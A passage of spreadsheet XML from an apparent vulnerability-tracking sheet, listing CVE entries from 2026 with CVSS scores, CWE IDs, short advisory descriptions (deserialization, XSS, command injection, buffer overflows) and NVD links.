      <c r="J1930" s="5" t="inlineStr"/>
      <c r="K1930" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1930" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the memcached cache plugin of the community.general Ansible
collection. Although its documentation states that records are stored in JSON
format, the plugin performs no explicit serialization and relies on
python-memcached, which pickles values on write and unpickles them on read.
Because memcached is unauthenticated and cache keys are predictable, an attacker
able to reach a network-exposed or shared memcached instance can write a crafted
pickle payload that is deserialized and executed on the Ansible controller when
the poisoned fact cache is next read, leading to remote code execution.</t>
        </is>
      </c>
      <c r="M1930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87874</t>
        </is>
      </c>
    </row>
    <row r="1931">
      <c r="A1931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87958</t>
        </is>
      </c>
      <c r="C1931" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1931" s="5" t="inlineStr"/>
      <c r="F1931" s="5" t="inlineStr"/>
      <c r="G1931" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H1931" s="5" t="inlineStr"/>
      <c r="I1931" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1931" s="5" t="inlineStr"/>
      <c r="K1931" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1931" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 is vulnerable to a denial of service where a specific functionality on a Db2 server can be disabled by a privileged user under certain conditions.</t>
        </is>
      </c>
      <c r="M1931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87958</t>
        </is>
      </c>
    </row>
    <row r="1932">
      <c r="A1932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14873</t>
        </is>
      </c>
      <c r="C1932" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1932" s="5" t="inlineStr"/>
      <c r="F1932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1932" s="5" t="inlineStr"/>
      <c r="H1932" s="5" t="inlineStr"/>
      <c r="I1932" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1932" s="5" t="inlineStr"/>
      <c r="K1932" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1932" s="5" t="inlineStr">
        <is>
          <t>The Bulk Password Reset plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.3. This is due to the plugin not properly validating a user's identity prior to updating their details like arbitrary user passwords, including administrator passwords, to a known plugin-configured custom value, enabling full account takeover of the site. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.</t>
        </is>
      </c>
      <c r="M1932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14873</t>
        </is>
      </c>
    </row>
    <row r="1933">
      <c r="A1933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15581</t>
        </is>
      </c>
      <c r="C1933" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1933" s="5" t="inlineStr"/>
      <c r="F1933" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1933" s="5" t="inlineStr"/>
      <c r="H1933" s="5" t="inlineStr"/>
      <c r="I1933" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1933" s="5" t="inlineStr"/>
      <c r="K1933" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1933" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the TrustyAI Service (TAS) deployment. This vulnerability allows any pod on the cluster network to bypass authentication and directly access the TAS backend API. An attacker can exploit this to read, tamper with, or delete monitoring data and configurations, and inject arbitrary data into the service, potentially disrupting tenant operations.</t>
        </is>
      </c>
      <c r="M1933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15581</t>
        </is>
      </c>
    </row>
    <row r="1934">
      <c r="A1934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28662</t>
        </is>
      </c>
      <c r="C1934" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1934" s="5" t="inlineStr"/>
      <c r="F1934" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1934" s="5" t="inlineStr"/>
      <c r="H1934" s="5" t="inlineStr"/>
      <c r="I1934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1934" s="5" t="inlineStr"/>
      <c r="K1934" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L1934" s="5" t="inlineStr">
        <is>
          <t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t>
        </is>
      </c>
    </row>
    <row r="1935">
      <c r="A1935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30826</t>
        </is>
      </c>
      <c r="C1935" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1935" s="5" t="inlineStr"/>
      <c r="F1935" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1935" s="5" t="inlineStr"/>
      <c r="H1935" s="5" t="inlineStr"/>
      <c r="I1935" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1935" s="5" t="inlineStr"/>
      <c r="K1935" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1935" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the testing OQL query functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30826</t>
        </is>
      </c>
    </row>
    <row r="1936">
      <c r="A1936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30890</t>
        </is>
      </c>
      <c r="C1936" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1936" s="5" t="inlineStr"/>
      <c r="F1936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1936" s="5" t="inlineStr"/>
      <c r="H1936" s="5" t="inlineStr"/>
      <c r="I1936" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1936" s="5" t="inlineStr"/>
      <c r="K1936" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1936" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the synchro import script. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30890</t>
        </is>
      </c>
    </row>
    <row r="1937">
      <c r="A1937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31803</t>
        </is>
      </c>
      <c r="C1937" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1937" s="5" t="inlineStr"/>
      <c r="F1937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1937" s="5" t="inlineStr"/>
      <c r="H1937" s="5" t="inlineStr"/>
      <c r="I1937" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1937" s="5" t="inlineStr"/>
      <c r="K1937" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1937" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in pages/tagadmin.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31803</t>
        </is>
      </c>
    </row>
    <row r="1938">
      <c r="A1938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31880</t>
        </is>
      </c>
      <c r="C1938" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1938" s="5" t="inlineStr"/>
      <c r="F1938" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1938" s="5" t="inlineStr"/>
      <c r="H1938" s="5" t="inlineStr"/>
      <c r="I1938" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1938" s="5" t="inlineStr"/>
      <c r="K1938" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1938" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the universal search. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31880</t>
        </is>
      </c>
    </row>
    <row r="1939">
      <c r="A1939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42807</t>
        </is>
      </c>
      <c r="C1939" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1939" s="5" t="inlineStr"/>
      <c r="F1939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1939" s="5" t="inlineStr"/>
      <c r="H1939" s="5" t="inlineStr"/>
      <c r="I1939" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1939" s="5" t="inlineStr"/>
      <c r="K1939" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1939" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in the PC bridge protocol decoder of BoschSensortec COINES_SDK (versions 2.10 through 2.12.2) allows attackers to cause a denial of service (process crash) or potentially execute arbitrary code. 
The bridge decoder ({{bridge_decoder.c}}) trusts the packet length field provided by the external device and forwards it to the host response queue ({{mqueue_add_data}}) without validating the bounds of the destination buffer. 
A malicious or compromised USB or Bluetooth Low Energy (BLE) peripheral can advertise a payload size up to ~3 KB, which exceeds the default queue slot size of 255 bytes. 
This results in an unbounded heap overwrite ({{memcpy}}), corrupting adjacent heap metadata on the host system when processing the device's response.</t>
        </is>
      </c>
      <c r="M1939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42807</t>
        </is>
      </c>
    </row>
    <row r="1940">
      <c r="A1940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45790</t>
        </is>
      </c>
      <c r="C1940" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1940" s="5" t="inlineStr"/>
      <c r="F1940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1940" s="5" t="inlineStr"/>
      <c r="H1940" s="5" t="inlineStr"/>
      <c r="I1940" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1940" s="5" t="inlineStr"/>
      <c r="K1940" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1940" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.6, Dokploy's organization.inviteMember tRPC procedure in apps/dokploy/server/api/routers/organization.ts allows a user with member:create permission to invite an account with the owner role, while packages/server/src/services/user.ts allows a privileged self-hosted user to create an account with an arbitrary role, enabling permanent organization takeover because owner roles cannot be demoted. This issue is fixed in version 0.29.6.</t>
        </is>
      </c>
      <c r="M1940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45790</t>
        </is>
      </c>
    </row>
    <row r="1941">
      <c r="A1941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47858</t>
        </is>
      </c>
      <c r="C1941" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1941" s="5" t="inlineStr"/>
      <c r="F1941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1941" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1941" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_tools</t>
        </is>
      </c>
      <c r="I1941" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1941" s="5" t="inlineStr"/>
      <c r="K1941" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1941" s="5" t="inlineStr">
        <is>
          <t>Starting Spring Boot applications in the Spring Tools with the live information mode enabled makes the running application vulnerable against JMX-based remote code execution.
Affected Spring Products and Versions:
Spring Tools for Eclipse: 5.2.0 and earlier
Spring Tools for VSCode / Cursor / Theia: 2.2.0 and earlier</t>
        </is>
      </c>
      <c r="M1941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47858</t>
        </is>
      </c>
    </row>
    <row r="1942">
      <c r="A1942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48080</t>
        </is>
      </c>
      <c r="C1942" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1942" s="5" t="inlineStr"/>
      <c r="F1942" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1942" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql</t>
        </is>
      </c>
      <c r="H1942" s="5" t="inlineStr"/>
      <c r="I1942" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1942" s="5" t="inlineStr"/>
      <c r="K1942" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1942" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, the `GET /api/tenants/{id}` endpoint returns the full tenant record to any authenticated `TENANT_ADMIN` of that tenant, including the `databaseUrl` field. This field contains the live PostgreSQL connection string the application uses to connect to that tenant's database. In the tested official `docker-compose.prod.yml` deployment, the connection string contained the user `postgres` with `rolsuper=true` and the plaintext password from `secrets/postgres_password.txt`. Operators who configure a non-superuser PostgreSQL user via `secrets/postgres_user.txt` would expose a less privileged credential, but the disclosure of the connection string itself is independent of that choice. The same credential applies to every database managed by that PostgreSQL instance: the central `appointment_booking` database, every per-tenant database (one per tenant), and the postgres administrative database. A `TENANT_ADMIN` of one tenant who can reach `postgres:5432` (directly via internal network, indirectly via any SSRF, RCE, or file-read in the application) can read every other tenant's appointment ciphertexts, key shares, and metadata; read the central user table, including all `GLOBAL_ADMIN` accounts, password hashes, and session records; modify or delete any data in any tenant database; and/or i a superuser-scoped deployment: use PostgreSQL's `pg_read_server_files`, `COPY ... FROM PROGRAM`, and `CREATE EXTENSION` for further escalation inside the database container. This breaks the per-tenant database isolation that is otherwise the primary cross-tenant control in the application. The application code carefully scopes most queries to the calling tenant's database, but those scopings are irrelevant once the attacker holds the credentials that bypass the application entirely. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M1942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48080</t>
        </is>
      </c>
    </row>
    <row r="1943">
      <c r="A1943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49832</t>
        </is>
      </c>
      <c r="C1943" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1943" s="5" t="inlineStr"/>
      <c r="F1943" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1943" s="5" t="inlineStr"/>
      <c r="H1943" s="5" t="inlineStr"/>
      <c r="I1943" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1943" s="5" t="inlineStr"/>
      <c r="K1943" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1943" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. From versions 8.0-rc1 to before 8.4, versions 9.0-rc1 to before 9.3, and version 10-rc1, Remote Code Execution (RCE) is possible via Velocity Templates used by DSpace for COAR Notify/LDN messages. This issue has been patched in versions 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="M1943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49832</t>
        </is>
      </c>
    </row>
    <row r="1944">
      <c r="A1944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52831</t>
        </is>
      </c>
      <c r="C1944" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1944" s="5" t="inlineStr"/>
      <c r="F1944" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1944" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1944" s="5" t="inlineStr"/>
      <c r="I1944" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1944" s="5" t="inlineStr"/>
      <c r="K1944" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1944" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.4, the Nuclio controller builds a curl invocation string for each cron trigger and stores it as the args of a Kubernetes CronJob container (/bin/sh, -c, &lt;command&gt;). Two fields in the trigger specification flow into this string without adequate sanitization: event.headers keys and event.body. This issue has been patched in version 1.16.4.</t>
        </is>
      </c>
      <c r="M1944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52831</t>
        </is>
      </c>
    </row>
    <row r="1945">
      <c r="A1945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52833</t>
        </is>
      </c>
      <c r="C1945" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1945" s="5" t="inlineStr"/>
      <c r="F1945" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1945" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1945" s="5" t="inlineStr"/>
      <c r="I1945" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1945" s="5" t="inlineStr"/>
      <c r="K1945" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1945" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.5, Nuclio's Java runtime generates a build.gradle file during function builds using Go's text/template package. The template renders runtimeAttributes.repositories[] values with the {{ . }} action, which performs no escaping. An attacker can embed a closing brace (}) to break out of the repositories {} block and append arbitrary Groovy statements that execute unconditionally during the Gradle configuration phase. This issue has been patched in version 1.16.5.</t>
        </is>
      </c>
      <c r="M1945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52833</t>
        </is>
      </c>
    </row>
    <row r="1946">
      <c r="A1946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53932</t>
        </is>
      </c>
      <c r="C1946" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1946" s="5" t="inlineStr"/>
      <c r="F1946" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1946" s="5" t="inlineStr"/>
      <c r="H1946" s="5" t="inlineStr"/>
      <c r="I1946" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1946" s="5" t="inlineStr"/>
      <c r="K1946" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L1946" s="5" t="inlineStr">
        <is>
          <t>laravel-backup-restore restores database backups made with spatie/laravel-backup. Prior to version 1.9.4, a crafted backup archive can trigger OS command injection during database restore. This issue has been patched in version 1.9.4.</t>
        </is>
      </c>
      <c r="M1946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53932</t>
        </is>
      </c>
    </row>
    <row r="1947">
      <c r="A1947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55277</t>
        </is>
      </c>
      <c r="C1947" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1947" s="5" t="inlineStr"/>
      <c r="F1947" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1947" s="5" t="inlineStr"/>
      <c r="H1947" s="5" t="inlineStr"/>
      <c r="I1947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1947" s="5" t="inlineStr"/>
      <c r="K1947" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L1947" s="5" t="inlineStr">
        <is>
          <t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t>
        </is>
      </c>
    </row>
    <row r="1948">
      <c r="A1948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68827</t>
        </is>
      </c>
      <c r="C1948" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1948" s="5" t="inlineStr"/>
      <c r="F1948" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1948" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1948" s="5" t="inlineStr"/>
      <c r="I1948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1948" s="5" t="inlineStr"/>
      <c r="K1948" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L1948" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t>
        </is>
      </c>
    </row>
    <row r="1949">
      <c r="A1949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="C1949" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1949" s="5" t="inlineStr"/>
      <c r="F1949" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1949" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1949" s="5" t="inlineStr"/>
      <c r="I1949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1949" s="5" t="inlineStr"/>
      <c r="K1949" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1949" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="1950">
      <c r="A1950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="C1950" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1950" s="5" t="inlineStr"/>
      <c r="F1950" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1950" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1950" s="5" t="inlineStr"/>
      <c r="I1950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1950" s="5" t="inlineStr"/>
      <c r="K1950" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1950" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="1951">
      <c r="A1951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68876</t>
        </is>
      </c>
      <c r="C1951" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1951" s="5" t="inlineStr"/>
      <c r="F1951" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1951" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1951" s="5" t="inlineStr"/>
      <c r="I1951" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1951" s="5" t="inlineStr"/>
      <c r="K1951" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1951" s="5" t="inlineStr">
        <is>
